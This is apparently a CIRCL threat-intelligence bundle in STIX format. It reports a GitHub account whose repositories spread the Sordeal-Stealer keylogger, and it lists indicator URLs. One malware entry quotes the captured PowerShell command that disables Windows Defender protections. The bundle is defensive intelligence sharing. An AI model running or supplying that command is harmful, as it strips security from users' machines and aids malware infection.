{
"type" : "bundle" ,
"id" : "bundle--659a6331-0690-4b3b-ae16-e29a1fc31fc2" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T15:06:39.000Z" ,
"modified" : "2023-04-11T15:06:39.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--659a6331-0690-4b3b-ae16-e29a1fc31fc2" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T15:06:39.000Z" ,
"modified" : "2023-04-11T15:06:39.000Z" ,
"name" : "Malicious GitHub user and account - distributing malicious code and running Sordeal-Stealer" ,
"published" : "2023-04-11T15:07:07Z" ,
"object_refs" : [
"observed-data--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"user-account--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"malware--508397b3-2a52-4012-9969-f63c7d4f3872" ,
"indicator--abf89a2e-30f6-460f-80de-1556fb9aceb7" ,
"indicator--6040acc9-ef3c-40ac-b38b-47ebfacd06e4" ,
"indicator--ea61ae8e-8a2c-435e-811d-e1967ee7d111" ,
"indicator--8265c383-09dc-447c-b9b8-ba17d1b765ff" ,
"note--bbeedf0d-072f-4551-b886-b9c57f50137f"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\"" ,
"tlp:clear" ,
"misp-galaxy:stealer=\"Sordeal-Stealer\"" ,
"misp-galaxy:mitre-attack-pattern=\"Exfiltration Over Alternative Protocol - T1048\"" ,
"misp-galaxy:mitre-attack-pattern=\"Browser Session Hijacking - T1185\"" ,
"misp-galaxy:mitre-attack-pattern=\"Keylogging - T1056.001\"" ,
"misp-galaxy:mitre-attack-pattern=\"GUI Input Capture - T1056.002\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T07:18:04.000Z" ,
"modified" : "2023-04-11T07:18:04.000Z" ,
"first_observed" : "2023-04-11T07:18:04Z" ,
"last_observed" : "2023-04-11T07:18:04Z" ,
"number_observed" : 1 ,
"object_refs" : [
"user-account--8c3b7eda-d3b0-4687-8150-230759232cb2"
] ,
"labels" : [
"misp:name=\"github-user\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
]
} ,
{
"type" : "user-account" ,
"spec_version" : "2.1" ,
"id" : "user-account--8c3b7eda-d3b0-4687-8150-230759232cb2" ,
"account_login" : "okkz" ,
"account_type" : "github" ,
"x_misp_bio" : "Self-taught python & web developer." ,
"x_misp_link" : "https://github.com/okkz" ,
"x_misp_profile_image" : {
"value" : "120434897.jpeg" ,
"data" : " / 9 j / 2 w C E A A g G B g c G B Q g H B w c J C Q g K D B Q N D A s L D B k S E w 8 U H R o f H h 0 a H B w g J C 4 n I C I s I x w c K D c p L D A x N D Q 0 H y c 5 P T g y P C 4 z N D I B C Q k J D A s M G A 0 N G D I h H C E y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M j I y M v / A A B E I A c w B z A M B I g A C E Q E D E Q H / x A G i A A A B B Q E B A Q E B A Q A A A A A A A A A A A Q I D B A U G B w g J C g s Q A A I B A w M C B A M F B Q Q E A A A B f Q E C A w A E E Q U S I T F B B h N R Y Q c i c R Q y g Z G h C C N C s c E V U t H w J D N i c o I J C h Y X G B k a J S Y n K C k q N D U 2 N z g 5 O k N E R U Z H S E l K U 1 R V V l d Y W V p j Z G V m Z 2 h p a n N 0 d X Z 3 e H l 6 g 4 S F h o e I i Y q S k 5 S V l p e Y m Z q i o 6 S l p q e o q a q y s 7 S 1 t r e 4 u b r C w 8 T F x s f I y c r S 0 9 T V 1 t f Y 2 d r h 4 u P k 5 e b n 6 O n q 8 f L z 9 P X 29 / j 5 + g E A A w E B A Q E B A Q E B A Q A A A A A A A A E C A w Q F B g c I C Q o L E Q A C A Q I E B A M E B w U E B A A B A n c A A Q I D E Q Q F I T E G E k F R B 2 F x E y I y g Q g U Q p G h s c E J I z N S 8 B V i c t E K F i Q 0 4 S X x F x g Z G i Y n K C k q N T Y 3 O D k 6 Q 0 R F R k d I S U p T V F V W V 1 h Z W m N k Z W Z n a G l q c 3 R 1 d n d 4 e X q C g 4 S F h o e I i Y q S k 5 S V l p e Y m Z q i o 6 S l p q e o q a q y s 7 S 1 t r e 4 u b r C w 8 T F x s f I y c r S 0 9 T V 1 t f Y 2 d r i 4 + T l 5 u f o 6 e r y 8 / T 19 v f 4 + f r / 2 g A M A w E A A h E D E Q A / A P N r s Z v b g n p u 4 / K o d p x V i 4 G + 6 m P / A E 0 N R t h V y T g V J q d Z 4 W K w a N N L I w V B K S S e w A F U b / V p t U Z o o S Y 7 H o e z T f 4 L / O q F s 9 x L Y R 20 p 22 y t v E e O X P X 5 v 8 A C r F X G P U i T 6 C A A A A D A F L R R W h m F F F F A B R R R Q A U U U U w C i i i g A o o o p A F F F F A B R R R T A K K K K A C i i i h g F F F F I A o o o o A K K S l o A K Q g M p U j I N L 
R Q M y L 1 L q D K / a J 5 I D k D d I T j P Y 574 N M T U 7 x J 45 h M W e N / M U s A f m y T z x z 95 u v r 7 C t h 0 W S M o 4 y D x W a d H u X n 2 W y i Q E g D 5 g O p w B + Z q H F L U d x w 1 u 5 E t j L 5 U L S W i u q l w S H D D B y M + n 680 l / q i a h b K k l q s b x r i M x v h Q T 944 I 74 H H Y 5 q t J p 97E5 R 7 a Q M A x x t P R c Z P u O R z 71E1 v c L k t B K A D g k o R g / l U X T A 3 W 1 z S J 0 t I 5 t F R V h X b I 0 W 0 G Q e X t x 0 H 8 Q B y c k c + t U p p d E k S 58 i y l h d i W h 3 M W 2 D a + F J B 5 + b Z z j s a y w c i l o S A m u o Y W u 7 n 7 J K i w K 58 o N u 5 X t / k 0 6 z 0 9 b u a W N r 62 h 2 b A G d g A 2 W A 4 J x 0 z k / T 8 a r 8 e g p M C q u K x u 2 / g 29 v F m a 0 v b K U Q q r P t c n B K s 2 O A c Y C E n N Z 13 o t 9 Y N O t w q A w H D 4 b P 8 Q X + Z q m B t 6 c Z 9 K f 5 k m w o J X 2 n q o P B 5 z 0 o C y 6 D O o o w R 0 N H S i g Y 5 m e Q g u 5 Y g Y G T m k p K W k A U U U U A F F F F A C E c 0 h 4 p 1 G K A J 7 V 1 i U 3 b X I E 9 q y N B C 6 F h J z z 9 M d f x r d g G s T J C I p r C U e U r L 8 h 4 A U j B I H X 5 / w D O K 56 C S O G d J J Y E n j U 5 a J y Q G H o S O a s 2 y W I T F 7 F e R y s d w M f A 2 E D H B 69 + a l o C G + j n i v H j u Y x H M o U N G P 4 e B x 9 e n 61 X r S a P S p I 3 c X E w c D j f g l 22 Z P H p n A z 71 H q l l b W E r R w 3 g u C G 42 g Y K 7 Q Q c g + 5 G P a m m S i j S g 0 l F M o 1 C D v l c 4 w X Y k / j S W s J u W E z g + U D 8 g P f 3 p f L + 0 S m B S T G r k y t 2 O S c L / j W i B g A d h 0 o j H q U 5 C / S i i i t T M K K K K A C i i i g A o o o p g F F F F A B R R R Q A U U U U A F F F F A B R R R S A K K K K A C i i i g A p G Y L j J x k 4 H 1 p a h u Y 2 k g Y J 98 c q f e g C a i m R O J Y U k A w G A P 0 p + P e g Y U U U U C C i i i g A p s i L J G Y 2 H y k c 0 6 i g Z A 7 p a l F T V r q N 8 c 5 J y q n s C R j H X v 7 U 4 s D d W z w 61 H M S + B 5 q F Q p w O u O 3 A 5 P r 9 a W 4 h 8 + E q M B w Q y E j o R y K y X u o 3 l u 2 u L S J X 
l L E B R t 8 p t p G A O e 5 B / C s X C z K u P b R L x E t H X y p F u 5 P K i M b 7 g z e m e l N u t I v r K 3 j n n g Z E k w V 7 k 5 B I O P T 5 W / I 1 J L d W k 1 v I A s 0 M q E v C A 3 y h i y d h w P l D 8 / S q w v 7 s r g 3 U x B Q x 4 Z y f l O e O e n U / m f W m D A 2 F 4 I I 5 z b y e V I M o w G d w 2 l v / Q Q T 9 B m o O V 5 I I + t W 11 O 9 W 2 W 384 t E i G N F K j 5 Q U Z M g 9 e F Z g O v W p b z W 769 j n S d o 284 B X I T B w G 3 A D 8 T + Q A o E Z + 6 j c O v 9 a e H h E W 0 2 + X x w 4 c 9 d u P 581 q 6 f c a G R p 8 F 9 Z u o V x 9 q n B P K 5 y c Y O c 9 B 0 45 o u B k d e R S V d u v 7 L J P 2 T z Q P J P 38 / w C s + T p 7 f f 8 A 0 q k M 4 o A K W k p a A C i i i g A o o o o A K M 0 U h o A U 1 e t t V v r W V b 5 b k P I k Z t l E h 3 E J j p g 9 q o n p U u + 2 + w G I 25 + 0 m U M J 9 / R M c r t 6 d e c 0 m P o b c s l 5 D J I 1 z p 1 r s 5 l w C D g B F 3 Y I 7 Y A J H u a h Z H Q s J d E D E b h K w w e B t B I x 0 P B 5 / w B q q U p s w k o E k y A l / L D E g k F B t B / H I P 4 V Z e N F W 4 i t d b Z 8 K 7 I m f 9 Z y P l z 78 / l U o z a s U 9 Q a 1 M o + y 2 s k C Z O V f r n 0 69 q p 1 Y v b i a e c i a c T F C Q H C 4 z z y a r 1 Z S O i g i W C F Y 15 x y T 6 n u T 9 a k o o r V C C i i i g A o o o o A K K K K Y B R R R Q A U U U U A F F F F A B R R R Q A U U U U A F F F F I A o o o p g F F F F I A p D S 0 h p g Q W 26 O W a I n 5 c 70 + h / 8 A r 5 q x V W 43 R z Q y o p Y 7 v L K j u D / k V Y R g 6 h h 0 I p A O o o o o A K K K K A C i l x x k U l A B 9 K g k s r G a Q S X U z W 4 Y 4 e U A k A 444 x 64 q w D g g 0 s 8 C S R n I B i k H c A 4 P 0 N J q 40 V b X Q L S f S r a 7 k 1 i C G W b / l i Q C Q d 6 r j r n O G 3 f g a g j 8 P X c 43 W 81 v I p 24 w 2 D y o b p + O K s 3 e s W R l m R / D 9 h G 5 w A V B G O Q e 349 + h r M L 6 S 7 k N a T L F k b d j Z Y D 5 c 9 T j s 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
} ,
"x_misp_repository" : [
"Tiktok-Username-Checker" ,
"Steam-ID-Checker" ,
"Tiktok-Username-Checker" ,
"lure-s-tiktok-username-checker-LEAKED" ,
"Steam-ID-Checker" ,
"Discord-Token-Checker"
]
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--508397b3-2a52-4012-9969-f63c7d4f3872" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T07:43:07.000Z" ,
"modified" : "2023-04-11T07:43:07.000Z" ,
"description" : "Fetched from https://rentry.co/shitbymyself/raw" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"PowerShell"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
] ,
"x_misp_script" : "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--abf89a2e-30f6-460f-80de-1556fb9aceb7" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:34.000Z" ,
"modified" : "2023-04-11T08:08:34.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/shitonyourAV/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--6040acc9-ef3c-40ac-b38b-47ebfacd06e4" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:42.000Z" ,
"modified" : "2023-04-11T08:08:42.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/shitbymyself/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:42Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--ea61ae8e-8a2c-435e-811d-e1967ee7d111" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:50.000Z" ,
"modified" : "2023-04-11T08:08:50.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/9ops5/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:50Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--8265c383-09dc-447c-b9b8-ba17d1b765ff" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T08:08:59.000Z" ,
"modified" : "2023-04-11T08:08:59.000Z" ,
"pattern" : "[url:value = 'https://rentry.co/khsph/raw']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2023-04-11T08:08:59Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "note" ,
"spec_version" : "2.1" ,
"id" : "note--bbeedf0d-072f-4551-b886-b9c57f50137f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2023-04-11T15:06:39.000Z" ,
"modified" : "2023-04-11T15:06:39.000Z" ,
"abstract" : "Notes" ,
"content" : "The GitHub account [okkz](@[suggestion](https://github.com/okkz)) hosts a series of repositories containing malicious Python code. The code is obfuscated and installs/executes a keylogger called [Sordeal-Stealer](https://github.com/SOrdeal/)." ,
"object_refs" : [
"report--659a6331-0690-4b3b-ae16-e29a1fc31fc2"
]
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}